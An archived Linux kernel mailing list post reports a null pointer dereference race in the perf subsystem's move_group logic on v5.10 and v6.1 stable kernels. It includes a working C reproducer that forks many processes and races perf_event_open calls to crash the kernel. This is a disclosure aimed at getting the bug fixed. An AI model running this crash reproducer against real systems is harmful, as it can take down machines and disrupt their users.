nullptr-deference in perf

From: Kyle Zeng
Date: Sat Oct 07 2023 - 01:48:10 EST

Next message: Gao Xiang: "Re: [PATCH 08/29] erofs: move erofs_xattr_handlers and xattr_handler_map to .rodata"
Previous message: Peng Liu: "[PATCH] tools/power turbostat: Fix Bzy_MHz calculation equation"
Next in thread: Greg KH: "Re: nullptr-deference in perf"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi there,

I found a nullptr dereference in perf subsystem and it affects at least
v5.10 and v6.1 stable trees. (the same poc cannot trigger the crash in
the mainline).

I fail to find the root cause the bug. All I know is that it is a race
condition in the logic of moving_groups from pure software-based perf
events to hardware ones. More specifically, when we add a hardware perf
event to a software event group, it will trigger a "move_group" logic in
perf_event_open. When the "move_group" logic happens, it will remove all
existing events from the context first using `perf_remove_from_context`.
And it will invoke `__perf_remove_from_context` through
`event_function_call`.

Notice that `event_function_call` is defined as follow:
~~~
static void event_function_call(struct perf_event *event, event_f func, void *data)
{
...
func(event, NULL, ctx, data);
...
}
~~~
This means `__perf_remove_from_context` will be invoked with
cpuctx==NULL, which leads to invoking `event_sched_out` with cpuctx ==
NULL.
At this moment, as long as the event is active, we are going to invoke
the `if (event->attr.exclusive || !cpuctx->active_oncpu)` logic, which
is a null pointer deference.

I don't know the proper way to patch this bug. So I'm asking for help.

A reproducer is attached to this email.

Best,
Kyle Zeng
#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <assert.h>
#include <linux/perf_event.h>

#include <linux/futex.h>

int pid;
int group_fd;

void context_setup()
{
int ret;
struct perf_event_attr attr = {0};

pid = getpid();

attr.type = PERF_TYPE_SOFTWARE;
attr.config = PERF_COUNT_SW_CPU_CLOCK;
attr.size = sizeof(attr);
attr.exclude_kernel = 1;

group_fd = syscall(__NR_perf_event_open, &attr, pid, 0, -1, 0); // group_fd = -1
// printf("group_fd: %d\n", group_fd);
assert(group_fd != -1);
//set_cpu(0);
}

void *func1(void *arg)
{
//set_cpu(2);
struct perf_event_attr attr = {.size = sizeof(attr)};

attr.type = PERF_TYPE_SOFTWARE;
attr.config = PERF_COUNT_SW_CPU_CLOCK;
attr.exclude_kernel = 1;

for(int i = 0; i < 0x20; i++)
syscall(__NR_perf_event_open, &attr, pid, 0, group_fd, 0);
}

void *func2(void *arg)
{
//set_cpu(1);
struct perf_event_attr attr = {.size = sizeof(attr)};

attr.type = PERF_TYPE_HARDWARE;
attr.config = PERF_COUNT_HW_CPU_CYCLES;
attr.exclude_kernel = 1;

syscall(__NR_perf_event_open, &attr, pid, 0, group_fd, 0);
}

void execute_two()
{
pthread_t tid1, tid2;

pthread_create(&tid1, NULL, func1, NULL);
pthread_create(&tid2, NULL, func2, NULL);

// set_cpu(0);

pthread_join(tid1, NULL);
pthread_join(tid2, NULL);
}

static void loop(void)
{
while(1) {
if(!fork()) {
context_setup();
execute_two();
exit(0);
}
wait(NULL);
}
}

int main(void)
{
for(int i=0; i<16; i++) {
if(!fork()) {
loop();
}
}
sleep(100000000);
return 0;
}

Next message: Gao Xiang: "Re: [PATCH 08/29] erofs: move erofs_xattr_handlers and xattr_handler_map to .rodata"
Previous message: Peng Liu: "[PATCH] tools/power turbostat: Fix Bzy_MHz calculation equation"
Next in thread: Greg KH: "Re: nullptr-deference in perf"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]